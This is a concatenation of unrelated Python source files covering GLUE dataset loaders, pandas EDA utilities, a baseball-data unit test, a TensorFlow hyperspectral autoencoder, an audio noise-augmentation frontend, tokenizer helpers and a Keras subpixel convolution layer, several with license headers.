cfile.write(entry) cfile.close() ######################### ########## MAIN ######### ######################### def main(): #get arguments args=get_settings() print("Not generalized yet. The VCF path printing to config file is hardcoded\n", file=sys.stderr) #create dictionary of weights per variant weight_dict=read_weights(args.weight_file,args.chrom_col,args.pos_col,args.ref_col,args.alt_col,args.coord_col,args.ea_col,args.weight_col,args.header_lines) #chr start end N chunk bgen sample prefix chunk_list=read_chunks(args.chunk_file,args.prefix_col) #write regions and config file make_regions(weight_dict,chunk_list,args.output_prefix,args.num_chunk) ##### Call main if __name__ == "__main__": main() riteshkumarumassedu/BERT-with-SOP import torch from torch.utils.data import Dataset, DataLoader import itertools import csv class data_parser(Dataset): """ Dataset Class to read data from the CSV file """ labels = None def __init__(self, file, pipeline=[]): Dataset.__init__(self) data = [] with open(file, "r") as f: lines = csv.reader(f, delimiter='\t', quotechar=None) for instance in self.get_instances(lines): for proc in pipeline: instance = proc(instance) data.append(instance) self.tensors = [torch.tensor(x, dtype=torch.long) for x in zip(*data)] def __len__(self): return self.tensors[0].size(0) def __getitem__(self, index): return tuple(tensor[index] for tensor in self.tensors) def get_instances(self, lines): """ get instance array from (csv-separated) line list """ raise NotImplementedError class load_MRPC_data(data_parser): """ Dataset class for MRPC """ labels = ("0", "1") # label names def __init__(self, file, pipeline=[]): super().__init__(file, pipeline) def get_instances(self, lines): for line in itertools.islice(lines, 1, None): # skip header yield line[0], line[3], line[4] # label, text_a, text_b class load_MNLI_data(data_parser): """ Dataset class for MNLI """ labels = ("contradiction", "entailment", "neutral") # label names def __init__(self, file, pipeline=[]): super().__init__(file, pipeline) def get_instances(self, lines): for line in itertools.islice(lines, 1, None): # skip header yield line[-1], line[8], line[9] # label, text_a, text_b class load_STSB_data(data_parser): """ Dataset Class for STSB""" labels = (None) # label names def __init__(self, file, pipeline=[]): super().__init__(file, pipeline) def get_instances(self, lines): for line in itertools.islice(lines, 1, None): # skip header yield line[-1], line[7], line[8] # label, text_a, text_b class load_QQP_data(data_parser): """ Dataset class for QQP""" labels = ("0", "1") # label names def __init__(self, file, pipeline=[]): super().__init__(file, pipeline) def get_instances(self, lines): for line in itertools.islice(lines, 1, None): # skip header yield line[5], line[3], line[4] # label, text_a, text_b class load_QNLI_data(data_parser): """ Dataset class for QNLI""" labels = ("entailment", "not_entailment") # label names def __init__(self, file, pipeline=[]): super().__init__(file, pipeline) def get_instances(self, lines): for line in itertools.islice(lines, 1, None): # skip header yield line[-1], line[1], line[2] # label, text_a, text_b class load_RTE_data(data_parser): """ Dataset class for RTE""" labels = ("entailment", "not_entailment") # label names def __init__(self, file, pipeline=[]): super().__init__(file, pipeline) def get_instances(self, lines): for line in itertools.islice(lines, 1, None): # skip header yield line[-1], line[1], line[2] # label, text_a, text_b class load_WNLI_data(data_parser): """ Dataset class for 
WNLI""" labels = ("0", "1") # label names def __init__(self, file, pipeline=[]): super().__init__(file, pipeline) def get_instances(self, lines): for line in itertools.islice(lines, 1, None): # skip header yield line[-1], line[1], line[2] # label, text_a, text_b def dataset_to_class_mapping(task): """ Mapping from task string to Dataset Class """ table = {'mrpc': load_MRPC_data, 'mnli': load_MNLI_data, 'wnli':load_WNLI_data, 'rte':load_RTE_data, 'qnli':load_QNLI_data, 'qqp':load_QQP_data, 'stsb':load_STSB_data} return table[task] import pandas_profiling import pandas as pd import matplotlib import matplotlib.pyplot as plt import seaborn as sns import numpy as np import warnings from scipy import stats from scipy.stats import norm import os warnings.filterwarnings("ignore") def create_summary_report(df,name = None): # Data profiling/EDA profile = pandas_profiling.ProfileReport( df, title="Data Audit Report \nAuthor: {}".format(name) ) if not os.path.exists('./reports/data_audit_report.html'): os.makedirs('reports') profile.to_file(output_file="./reports/data_audit_report.html") def check_missing_data(df): flag=df.isna().sum().any() if flag==True: total = df.isnull().sum() percent = (df.isnull().sum()*100)/(df.isnull().count()) output = pd.concat([total, percent], axis=1, keys=['Total', 'Percent']) data_type = [] # written by Ved for col in df.columns: dtype = str(df[col].dtype) data_type.append(dtype) output['Types'] = data_type return(np.transpose(output)) else: return(False) def reduce_mem_usage(df, verbose=True): numerics = ["int16", "int32", "int64", "float16", "float32", "float64"] start_mem = df.memory_usage(deep=True).sum() / 1024 ** 2 for col in df.columns: col_type = df[col].dtypes if col_type in numerics: c_min = df[col].min() c_max = df[col].max() if str(col_type)[:3] == "int": if c_min > np.iinfo(np.int8).min and c_max < np.iinfo(np.int8).max: df[col] = df[col].astype(np.int8) elif c_min > np.iinfo(np.int16).min and c_max < np.iinfo(np.int16).max: df[col] = df[col].astype(np.int16) elif c_min > np.iinfo(np.int32).min and c_max < np.iinfo(np.int32).max: df[col] = df[col].astype(np.int32) elif c_min > np.iinfo(np.int64).min and c_max < np.iinfo(np.int64).max: df[col] = df[col].astype(np.int64) else: if ( c_min > np.finfo(np.float16).min and c_max < np.finfo(np.float16).max ): df[col] = df[col].astype(np.float16) elif ( c_min > np.finfo(np.float32).min and c_max < np.finfo(np.float32).max ): df[col] = df[col].astype(np.float32) else: df[col] = df[col].astype(np.float64) end_mem = df.memory_usage(deep=True).sum() / 1024 ** 2 if verbose: print( "Mem. usage decreased to {:5.2f} Mb ({:.1f}% reduction)".format( end_mem, 100 * (start_mem - end_mem) / start_mem ) ) return df def gen_eda(data_frame): print("##########----------##########") print(f"Dataset has {data_frame.shape[0]} rows and {data_frame.shape[1]} columns.") print("##########----------##########") print( f"There are {data_frame.isnull().any().sum()} columns in the dataset with missing values." ) print("##########----------##########") one_value_cols = [ col for col in data_frame.columns if data_frame[col].nunique() <= 1 ] print( f"There are {len(one_value_cols)} columns in the dataset with one unique value." 
) print("##########----------##########") dtype_df = data_frame.dtypes.reset_index() dtype_df.columns = ["Count", "Column Type"] print(dtype_df) print("##########----------##########") df1 = dtype_df.groupby("Column Type").aggregate("count").reset_index() print(df1) print("##########----------##########") # Number of unique classes in each object column df2 = data_frame.select_dtypes("object").apply(pd.Series.nunique, axis=0) print(df2) def general_stats(data_frame): stats = [] for col in data_frame.columns: stats.append( ( col, data_frame[col].nunique(), data_frame[col].isnull().sum() * 100 / data_frame.shape[0], data_frame[col].value_counts(normalize=True, dropna=False).values[0] * 100, data_frame[col].dtype, ) ) stats_df = pd.DataFrame( stats, columns=[ "Feature", "Unique_values", "Percentage of missing values", "Percentage of values in the biggest category", "type", ], ) stats_df.sort_values("Percentage of missing values", ascending=False) print(stats_df) def find_correlations(data_frame, dependent): # Find correlations with the target and sort correlations = data_frame.corr()[dependent].sort_values() # Display correlations print("Most Positive Correlations:\n", correlations.tail(15)) print("\nMost Negative Correlations:\n", correlations.head(15)) def missing_values_table(df): # Total missing values mis_val = df.isnull().sum() # Percentage of missing values mis_val_percent = 100 * df.isnull().sum() / len(df) # Make a table with the results mis_val_table = pd.concat([mis_val, mis_val_percent], axis=1) # Rename the columns mis_val_table_ren_columns = mis_val_table.rename( columns={0: "Missing Values", 1: "% of Total Values"} ) # Sort the table by percentage of missing descending mis_val_table_ren_columns = ( mis_val_table_ren_columns[mis_val_table_ren_columns.iloc[:, 1] != 0] .sort_values("% of Total Values", ascending=False) .round(1) ) # Print some summary information print( "Your selected dataframe has " + str(df.shape[1]) + " columns.\n" "There are " + str(mis_val_table_ren_columns.shape[0]) + " columns that have missing values." 
) # Return the dataframe with missing information return mis_val_table_ren_columns def print_quantiles(data_frame, column): data_frame[column] = data_frame[column].astype(float) print(f"{column} Quantiles:") print( data_frame[column].quantile( [0.0, 0.01, 0.025, 0.1, 0.25, 0.5, 0.75, 0.9, 0.95, 0.975, 0.99, 1.0] ) ) def time_series_plot(df): """Given dataframe, generate times series plot of numeric data by daily, monthly and yearly frequency""" print( "\nTo check time series of numeric data by daily, monthly and yearly frequency" ) if len(df.select_dtypes(include="datetime64").columns) > 0: for col in df.select_dtypes(include="datetime64").columns: for p in ["D", "M", "Y"]: if p == "D": print("Plotting daily data") elif p == "M": print("Plotting monthly data") else: print("Plotting yearly data") for col_num in df.select_dtypes(include=np.number).columns: __ = df.copy() __ = __.set_index(col) __T = __.resample(p).sum() ax = __T[[col_num]].plot() ax.set_ylim(bottom=0) ax.get_yaxis().set_major_formatter( matplotlib.ticker.FuncFormatter( lambda x, p: format(int(x), ",") ) ) plt.show() def numeric_eda(df, hue=None): """Given dataframe, generate EDA of numeric data""" print("\nTo check: \nDistribution of numeric data") pd.display(df.describe().T) columns = df.select_dtypes(include=np.number).columns figure = plt.figure(figsize=(20, 10)) figure.add_subplot(1, len(columns), 1) for index, col in enumerate(columns): if index > 0: figure.add_subplot(1, len(columns), index + 1) sns.boxplot(y=col, data=df, boxprops={"facecolor": "None"}) figure.tight_layout() plt.show() if len(df.select_dtypes(include="category").columns) > 0: for col_num in df.select_dtypes(include=np.number).columns: for col in df.select_dtypes(include="category").columns: fig = sns.catplot( x=col, y=col_num, kind="violin", data=df, height=5, aspect=2 ) fig.set_xticklabels(rotation=90) plt.show() # Plot the pairwise joint distributions print("\nTo check pairwise joint distribution of numeric data") if hue == None: sns.pairplot(df.select_dtypes(include=np.number)) else: sns.pairplot(df.select_dtypes(include=np.number).join(df[[hue]]), hue=hue) plt.show() def top5(df): """Given dataframe, generate top 5 unique values for non-numeric data""" columns = df.select_dtypes(include=["object", "category"]).columns for col in columns: print("Top 5 unique values of " + col) print( df[col] .value_counts() .reset_index() .rename(columns={"index": col, col: "Count"})[ : min(5, len(df[col].value_counts())) ] ) print(" ") def categorical_eda(df, hue=None): """Given dataframe, generate EDA of categorical data""" print("\nTo check: \nUnique count of non-numeric data\n") print(df.select_dtypes(include=["object", "category"]).nunique()) top5(df) # Plot count distribution of categorical data for col in df.select_dtypes(include="category").columns: fig = sns.catplot(x=col, kind="count", data=df, hue=hue) fig.set_xticklabels(rotation=90) plt.show() if __name__ == "__main__": df = pd.read_csv("../input/train_house_price.csv") # gen_eda(df) # general_stats(df) # find_correlations(df, 'SalePrice') missing_values_table(df) #!/usr/bin/env python import unittest import mlbgame class TestEvents(unittest.TestCase): def test_game_events(self): events = mlbgame.game_events('2016_08_02_nyamlb_nynmlb_1') for inning in events: self.assertIsInstance(inning.num, int) if inning.num == 1: i = inning self.assertIsInstance(inning.top, list) self.assertIsInstance(inning.bottom, list) atbats = inning.top + inning.bottom for atbat in atbats: if inning.num == 1 and atbat.num == 
1: ab = atbat self.assertIsInstance(atbat.away_team_runs, int) self.assertIsInstance(atbat.b, int) self.assertIsInstance(atbat.b1, (int, str)) self.assertIsInstance(atbat.b2, (int, str)) self.assertIsInstance(atbat.b3, (int, str)) self.assertIsInstance(atbat.batter, int) self.assertIsInstance(atbat.des, str) try: self.assertIsInstance(atbat.des_es, (unicode, str)) except NameError: self.assertIsInstance(atbat.des_es, str) self.assertIsInstance(atbat.event, str) try: self.assertIsInstance(atbat.event_es, (unicode, str)) except NameError: self.assertIsInstance(atbat.event_es, str) self.assertIsInstance(atbat.event_num, int) self.assertIsInstance(atbat.home_team_runs, int) self.assertIsInstance(atbat.num, int) self.assertIsInstance(atbat.o, int) self.assertIsInstance(atbat.pitcher, int) self.assertIsInstance(atbat.pitches, list) self.assertIsInstance(atbat.play_guid, str) self.assertIsInstance(atbat.s, int) self.assertIsInstance(atbat.start_tfs, int) self.assertIsInstance(atbat.start_tfs_zulu, str) for pitch in atbat.pitches: self.assertIsInstance(pitch.des, str) try: self.assertIsInstance(pitch.des_es, (unicode, str)) except NameError: self.assertIsInstance(pitch.des_es, str) self.assertIsInstance(pitch.pitch_type, str) self.assertIsInstance(pitch.start_speed, float) self.assertIsInstance(pitch.sv_id, (str, int)) self.assertIsInstance(pitch.type, str) inning = i self.assertEqual(inning.num, 1) self.assertEqual(inning.__str__(), 'Inning 1') atbat = ab self.assertEqual(atbat.away_team_runs, 0) self.assertEqual(atbat.b, 1) self.assertEqual(atbat.b1, '') self.assertEqual(atbat.b2, '') self.assertEqual(atbat.b3, '') self.assertEqual(atbat.batter, 458731) self.assertEqual(atbat.des, ' flies out to center fielder Ale. ') self.assertEqual(atbat.des_es, ' batea elevado de out a jardinero central . ') self.assertEqual(atbat.event, 'Flyout') self.assertEqual(atbat.event_es, 'Elevado de Out') self.assertEqual(atbat.event_num, 6) self.assertEqual(atbat.home_team_runs, 0) self.assertEqual(atbat.num, 1) self.assertEqual(atbat.o, 1) self.assertEqual(atbat.pitcher, 594798) self.assertEqual(atbat.play_guid, 'e91fe0bf-6e1e-40a3-953c-47a943b37638') self.assertEqual(atbat.s, 0) self.assertEqual(atbat.start_tfs, 231105) self.assertEqual(atbat.start_tfs_zulu, '2016-08-02T23:11:05Z') self.assertEqual(atbat.__str__(), ' flies out to center fielder . ') pitch = atbat.pitches[0] self.assertEqual(pitch.des, 'Ball') self.assertEqual(pitch.des_es, 'Bola mala') self.assertEqual(pitch.pitch_type, 'FT') self.assertEqual(pitch.start_speed, 95.2) self.assertEqual(pitch.type, 'B') self.assertEqual(pitch.__str__(), 'Pitch: FT at 95.2: Ball') def test_game_events_empty(self): self.assertRaises(ValueError, lambda: mlbgame.game_events('game_id')) self.assertRaises(ValueError, lambda: mlbgame.game_events('2016_08_02_nymlb_nymlb_1')) _sadm/listen/webhook/__init__.py # Copyright (c) <> # See LICENSE file. from . import handlers __all__ = [] """ ======================================================================= General Information ------------------- Codename: DeepCASSI (ACM SIGGRAPH Asia 2017) Writers: (), (), (), () Institute: KAIST Visual Computing Laboratory For information please see the paper: High-Quality Hyperspectral Reconstruction Using a Spectral Prior ACM SIGGRAPH ASIA 2017, , , , , Visit our project http://vclab.kaist.ac.kr/siggraphasia2017p1/ for the hyperspectral image dataset. Please cite this paper if you use this code in an academic publication. 
Bibtex:
@Article{DeepCASSI:SIGA:2017,
  author  = { and  and  and  and },
  title   = {High-Quality Hyperspectral Reconstruction Using a Spectral Prior},
  journal = {ACM Transactions on Graphics (Proc. SIGGRAPH Asia 2017)},
  year    = {2017},
  volume  = {36},
  number  = {6},
  pages   = {218:1-13},
  doi     = "10.1145/3130800.3130810",
  url     = "http://dx.doi.org/10.1145/3130800.3130810",
}
==========================================================================
License Information
-------------------
, , ,  have developed this software and related documentation (the
"Software"); confidential use in source form of the Software, without
modification, is permitted provided that the following conditions are met:

Neither the name of the copyright holder nor the names of any contributors
may be used to endorse or promote products derived from the Software
without specific prior written permission.

The use of the software is for Non-Commercial Purposes only. As used in this
Agreement, "Non-Commercial Purpose" means for the purpose of education or
research in a non-commercial organisation only. "Non-Commercial Purpose"
excludes, without limitation, any use of the Software for, as part of, or in
any way in connection with a product (including software) or service which
is sold, offered for sale, licensed, leased, published, loaned or rented.
If you require a license for a use excluded by this agreement,
please email [].

License: GNU General Public License Usage
Alternatively, this file may be used under the terms of the GNU General
Public License version 3.0 as published by the Free Software Foundation
and appearing in the file LICENSE.GPL included in the packaging of this
file. Please review the following information to ensure the GNU General
Public License version 3.0 requirements will be met:
http://www.gnu.org/copyleft/gpl.html.

Warranty: KAIST-VCLAB MAKES NO REPRESENTATIONS OR WARRANTIES ABOUT THE
SUITABILITY OF THE SOFTWARE, EITHER EXPRESS OR IMPLIED, INCLUDING BUT NOT
LIMITED TO THE IMPLIED WARRANTIES OF MERCHANTABILITY, FITNESS FOR A
PARTICULAR PURPOSE, OR NON-INFRINGEMENT. KAIST-VCLAB SHALL NOT BE LIABLE
FOR ANY DAMAGES SUFFERED BY LICENSEE AS A RESULT OF USING, MODIFYING OR
DISTRIBUTING THIS SOFTWARE OR ITS DERIVATIVES.
======================================================================= """ import tensorflow as tf import params # 'c': convolutional default_n_features_encoder = [params.N_VALID_SPECTRALS, 64, 64, 64, 64, 64, 64] default_layer_type_encoder = ['c', 'c', 'c', 'c', 'c', 'c'] default_n_features_decoder = default_n_features_encoder[::-1] default_layer_type_decoder = ['c', 'c', 'c', 'c', 'c', 'c'] def build_convoultiona_ae(list_n_features_encoder=default_n_features_encoder, list_layer_type_encoder=default_layer_type_encoder, list_n_features_decoder=default_n_features_decoder, list_layer_type_decoder= default_layer_type_decoder, is_trainable=True, with_wd=True ): ######################################################### # Check dimensions ######################################################### if list_n_features_encoder[-1] != list_n_features_decoder[0]: print('The output side of the encoder' \ ' and the input size of decoder do not match') exit() if list_n_features_encoder[0] != list_n_features_decoder[-1]: print('The input side of the encoder' \ ' and the output size of decoder do not match') exit() if (list_n_features_encoder[0] != params.N_VALID_SPECTRALS)\ or(list_n_features_decoder[-1] != params.N_VALID_SPECTRALS): print('The input and the output sizes do not match with the n_channels') exit() if (len(list_n_features_encoder) != len(list_layer_type_encoder) + 1) \ or (len(list_n_features_decoder) != len(list_layer_type_decoder) + 1): print('The input and the output sizes do not match with the n_channels') exit() n_convs_encoder = len(list_layer_type_encoder) n_convs_decoder = len(list_layer_type_decoder) ######################################################### # Set placeholders ######################################################### # the shape should be (batchsize, psize, psize, n_channels x_data_node = tf.placeholder(params.TF_DATA_TYPE, name='data') x_data_out_node = tf.placeholder(params.TF_DATA_TYPE, name='data') ksize = params.TF_CONV_KERNEL_SIZE # for weight decay conv_weight_list = [] ######################################################### # Build the encoder ######################################################### layer_name_base = 'encoder' response = x_data_node for l in range(n_convs_encoder): l_type = list_layer_type_encoder[l] layer_name = layer_name_base + '-conv' + str(l) n_feature_prev = list_n_features_encoder[l] n_feature_next = list_n_features_encoder[l + 1] if l_type == 'c' or l_type == 'p': if l_type == 'c': list_stride = [1, 1, 1, 1] pad = 'SAME' else: list_stride = [1, 2, 2, 1] pad = 'SAME' with tf.variable_scope(layer_name): conv_weight = tf.get_variable("weight", shape=[ksize, ksize, n_feature_prev, n_feature_next], initializer=tf.contrib.layers.xavier_initializer_conv2d(), trainable=is_trainable) conv_bias = tf.Variable(tf.zeros([n_feature_next],dtype=params.TF_DATA_TYPE), name='bias', trainable=is_trainable) conv = tf.nn.conv2d(response, conv_weight, strides=list_stride, padding=pad) response = tf.nn.bias_add(conv, conv_bias) if with_wd: conv_weight_list.append(conv_weight) if l == (n_convs_encoder - 1): response = tf.identity(response) else: response = tf.nn.relu(response) else: print('A wrong layer type for the encoder') exit() if l == (n_convs_encoder - 1): response_code = response ######################################################### # Build the decoder ######################################################### layer_name_base = 'decoder' for l in range(n_convs_decoder): l_type = list_layer_type_decoder[l] layer_name = layer_name_base + '-conv' 
+ str(l) n_feature_prev = list_n_features_decoder[l] n_feature_next = list_n_features_decoder[l + 1] if l_type == 'c': list_stride = [1, 1, 1, 1] pad = 'SAME' with tf.variable_scope(layer_name): conv_weight = tf.get_variable("weight", shape=[ksize, ksize, n_feature_prev, n_feature_next], initializer=tf.contrib.layers.xavier_initializer_conv2d(), trainable=is_trainable) conv_bias = tf.Variable(tf.zeros([n_feature_next], dtype=params.TF_DATA_TYPE), name='bias', trainable=is_trainable) conv = tf.nn.conv2d(response, conv_weight, strides=list_stride, padding=pad) response = tf.nn.bias_add(conv, conv_bias) if l == (n_convs_decoder - 1): response = tf.nn.relu(response) else: response = tf.nn.relu(response) if with_wd: conv_weight_list.append(conv_weight) else: print('A wrong layer type for the decoder') exit() x_data_predicted_node = response ######################################################### # define the loss - data term ######################################################### data_loss = tf.reduce_mean(tf.square(x_data_predicted_node - x_data_out_node), name='training_error') training_error = data_loss testing_error = tf.Variable(0.0, name='var_testing_err') ph_testing_error = tf.placeholder(dtype=tf.float32) op_assign_testing_error = tf.assign(testing_error, ph_testing_error) testing_psnr = tf.Variable(0.0, name='var_testing_psnr') ph_testing_psnr = tf.placeholder(dtype=tf.float32) op_assign_testing_psnr = tf.assign(testing_psnr, ph_testing_psnr) ######################################################### # define the loss - weight decay term ######################################################### if with_wd: weight_lambda = params.TF_WEIGHT_DECAY_LAMBDA weight_decay_term\ = weight_lambda * tf.add_n([tf.nn.l2_loss(v) for v in conv_weight_list]) weight_decay_term /= len(conv_weight_list) training_error += weight_decay_term ######################################################### # Add summaries ######################################################### training_error_summary = tf.summary.scalar('training error', training_error) data_loss_summary = tf.summary.scalar('data_loss', data_loss) testing_error_summary = tf.summary.scalar('testing error', testing_error) testing_psnr_summary = tf.summary.scalar('testing psnr', testing_psnr) if with_wd: weight_decay_error_summary = tf.summary.scalar('weight decay error', weight_decay_term) summary_op_weight_decay = tf.summary.merge([weight_decay_error_summary]) ######################################################### # Add saver ######################################################### saver = tf.train.Saver() summary_op_training = tf.summary.merge([training_error_summary]) summary_op_data_loss = tf.summary.merge([data_loss_summary]) summary_op_testing = tf.summary.merge([testing_error_summary]) summary_op_testing_psnr = tf.summary.merge([testing_psnr_summary]) ######################################################### # Return model ######################################################### model = {'x_data_node': x_data_node, 'x_data_out_node': x_data_out_node, 'x_data_predicted_node': x_data_predicted_node, 'code': response_code, 'training_error': training_error, 'data_loss': data_loss, 'ph_testing_error': ph_testing_error, 'op_assign_testing_error': op_assign_testing_error, 'ph_testing_psnr': ph_testing_psnr, 'op_assign_testing_psnr': op_assign_testing_psnr, 'summary_op_training': summary_op_training, 'summary_op_data_loss': summary_op_data_loss, 'summary_op_testing': summary_op_testing, 'summary_op_testing_psnr': summary_op_testing_psnr, 
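        # below: the tf.train.Saver handle; when with_wd is True, the weight-decay
        # term and its summary op are also attached to the returned model dict
        # right after it is built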
        'saver': saver,
        }

    if with_wd:
        model['weight_decay_term'] = weight_decay_term
        model['summary_op_weight_decay'] = summary_op_weight_decay

    return model


# Copyright (C) 2017 Beijing Didi Infinity Technology and Development Co.,Ltd.
# All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""This model adds noise/rir to signal and writes it to file."""

import delta.compat as tf

from delta.utils.hparam import HParams
from delta.data.frontend.read_wav import ReadWav
from delta.data.frontend.add_rir_noise_aecres import Add_rir_noise_aecres
from delta.data.frontend.write_wav import WriteWav
from delta.data.frontend.base_frontend import BaseFrontend


class AddNoiseEndToEnd(BaseFrontend):
  """
  Add a random signal-to-noise ratio noise or impulse response to clean speech,
  and write it to wavfile.
  """

  def __init__(self, config: dict):
    super().__init__(config)
    self.add_noise = Add_rir_noise_aecres(config)
    self.read_wav = ReadWav(config)
    self.write_wav = WriteWav(config)

  @classmethod
  def params(cls, config=None):
    """
    Set params.
    :param config: contains ten optional parameters:
        --sample_rate     : Sample frequency of waveform data. (int, default = 16000)
        --if_add_rir      : If true, add rir to audio data. (bool, default = False)
        --rir_filelist    : FileList path of rir. (string, default = 'rirlist.scp')
        --if_add_noise    : If true, add random noise to audio data. (bool, default = False)
        --snr_min         : Minimum SNR adds to signal. (float, default = 0)
        --snr_max         : Maximum SNR adds to signal. (float, default = 30)
        --noise_filelist  : FileList path of noise. (string, default = 'noiselist.scp')
        --if_add_aecres   : If true, add aecres to audio data. (bool, default = False)
        --aecres_filelist : FileList path of aecres. (string, default = 'aecreslist.scp')
        --speed           : Speed of sample channels wanted. (float, default = 1.0)
    :return: An object of class HParams, which is a set of hyperparameters as
             name-value pairs.
    """
    sample_rate = 16000
    if_add_rir = False
    rir_filelist = 'rirlist.scp'
    if_add_noise = False
    noise_filelist = 'noiselist.scp'
    snr_min = 0
    snr_max = 30
    if_add_aecres = False
    aecres_filelist = 'aecreslist.scp'
    audio_channels = 1
    speed = 1.0

    hparams = HParams(cls=cls)
    hparams.add_hparam('sample_rate', sample_rate)
    hparams.add_hparam('speed', speed)
    hparams.add_hparam('if_add_rir', if_add_rir)
    hparams.add_hparam('if_add_noise', if_add_noise)
    hparams.add_hparam('rir_filelist', rir_filelist)
    hparams.add_hparam('noise_filelist', noise_filelist)
    hparams.add_hparam('snr_min', snr_min)
    hparams.add_hparam('snr_max', snr_max)
    hparams.add_hparam('if_add_aecres', if_add_aecres)
    hparams.add_hparam('aecres_filelist', aecres_filelist)
    hparams.add_hparam('audio_channels', audio_channels)

    if config is not None:
      hparams.override_from_dict(config)

    return hparams

  def call(self, in_wavfile, out_wavfile):
    """
    Read a clean wav and return a noisy wav.
    :param in_wavfile: clean wavfile path.
    :param out_wavfile: noisy wavfile path.
    :return: write wav operation.
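
    A minimal usage sketch (illustrative only: the wav paths are placeholders,
    and the params().instantiate() / __call__ plumbing is assumed to follow the
    usual delta frontend pattern rather than being confirmed here):

        config = {'if_add_noise': True, 'snr_min': 5, 'snr_max': 20}
        frontend = AddNoiseEndToEnd.params(config).instantiate()
        write_op = frontend('clean.wav', 'noisy.wav')
        # under graph mode (delta.compat) write_op is a TF op that still has to
        # be executed, e.g. with tf.Session().run(write_op)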
""" with tf.name_scope('add_noise_end_to_end'): input_data, sample_rate = self.read_wav(in_wavfile) noisy_data = self.add_noise(input_data, sample_rate) / 32768 write_op = self.write_wav(out_wavfile, noisy_data, sample_rate) return write_op """Text processing methods.""" import allnews_am.tokenizer.tokenizer as tokenizer def tokenize(s): """Tokenizes a string into a sequence of sentences and words. Args: s: The string to tokenize. Returns: A Sequence of sequences, where the top level sequence are sentences and each sentence is a sequence of string tokens. """ s = s.strip() if len(s) > 0 and s[-1] != ':': s += ':' # Required for correct tokenization. t = tokenizer.Tokenizer(s) t.segmentation().tokenization() # Segments are the sentences. # Tokens are the words and punctuation. return [ # There care cases where 'ե՛ւ' would be represented twice, such as # ('1-2', 'ե՛ւ'), (1, 'եւ'), (2, '՛'). Hence, the check for integer as # the first element of the tuple. [t[1] for t in sentence['tokens'] if isinstance(t[0], int)] for sentence in t.segments ] SoyNLP/soynlp/hangle/__init__.py1-10 from ._distance import levenshtein from ._distance import jamo_levenshtein from ._distance import cosine_distance from ._distance import jaccard_distance from ._hangle import normalize from ._hangle import decompose from ._hangle import compose from ._hangle import character_is_korean from ._hangle import character_is_jaum from ._hangle import character_is_moum from ._hangle import to_base from ._hangle import character_is_number from ._hangle import character_is_english from ._hangle import ConvolutionHangleEncoderfrom tensorflow.keras.layers import Layer from tensorflow.keras.utils import get_custom_objects from tensorflow.nn import depth_to_space class SubpixelConv2D(Layer): """ Subpixel Conv2D Layer upsampling a layer from (h, w, c) to (h*r, w*r, c/(r*r)), where r is the scaling factor, default to 4 # Arguments upsampling_factor: the scaling factor # Input shape Arbitrary. Use the keyword argument `input_shape` (tuple of integers, does not include the samples axis) when using this layer as the first layer in a model. # Output shape the second and the third dimension increased by a factor of `upsampling_factor`; the last layer decreased by a factor of `upsampling_factor^2`. # References Real-Time Single Image and Video Super-Resolution Using an Efficient Sub-Pixel Convolutional Neural Network Shi et Al. 
https://arxiv.org/abs/1609.05158 """ # Code borrowed from: https://github.com/fengwang/subpixel_conv2d def __init__(self, upsampling_factor=4, **kwargs): super(SubpixelConv2D, self).__init__(**kwargs) self.upsampling_factor = upsampling_factor def build(self, input_shape): last_dim = input_shape[-1] factor = self.upsampling_factor * self.upsampling_factor if last_dim % (factor) != 0: raise ValueError('Channel ' + str(last_dim) + ' should be of ' 'integer times of upsampling_factor^2: ' + str(factor) + '.') def call(self, inputs, **kwargs): return depth_to_space( inputs, self.upsampling_factor ) def get_config(self): config = { 'upsampling_factor': self.upsampling_factor, } base_config = super(SubpixelConv2D, self).get_config() return dict(list(base_config.items()) + list(config.items())) def compute_output_shape(self, input_shape): factor = self.upsampling_factor * self.upsampling_factor input_shape_1 = None if input_shape[1] is not None: input_shape_1 = input_shape[1] * self.upsampling_factor input_shape_2 = None if input_shape[2] is not None: input_shape_2 = input_shape[2] * self.upsampling_factor dims = [ input_shape[0], input_shape_1, input_shape_2, int(input_shape[3]/factor) ] return tuple( dims ) get_custom_objects().update({'SubpixelConv2D': SubpixelConv2D}) if __name__ == '__main__': from tensorflow.keras.layers import Input from tensorflow.keras.models import Model, load_model ip = Input(shape=(32, 32, 16)) x = SubpixelConv2D(upsampling_factor=4)(ip) model = Model(ip, x) model.summary() model.save( 'model.h5' ) print( '*'*80 ) nm = load_model( 'model.h5' ) print( 'new model loaded successfully' ) melodic/lib/python2.7/dist-packages/rqt_console/filters/time_filter_widget.py # Software License Agreement (BSD License) # # Copyright (c) 2012, , Inc. # All rights reserved. # # Redistribution and use in source and binary forms, with or without # modification, are permitted provided that the following conditions # are met: # # * Redistributions of source code must retain the above copyright # notice, this list of conditions and the following disclaimer. # * Redistributions in binary form must reproduce the above # copyright notice, this list of conditions and the following # disclaimer in the documentation and/or other materials provided # with the distribution. # * Neither the name of , Inc. nor the names of its # contributors may be used to endorse or promote products derived # from this software without specific prior written permission. # # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS # "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT # LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS # FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE # COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, # INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, # BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; # LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER # CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT # LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN # ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE # POSSIBILITY OF SUCH DAMAGE. 
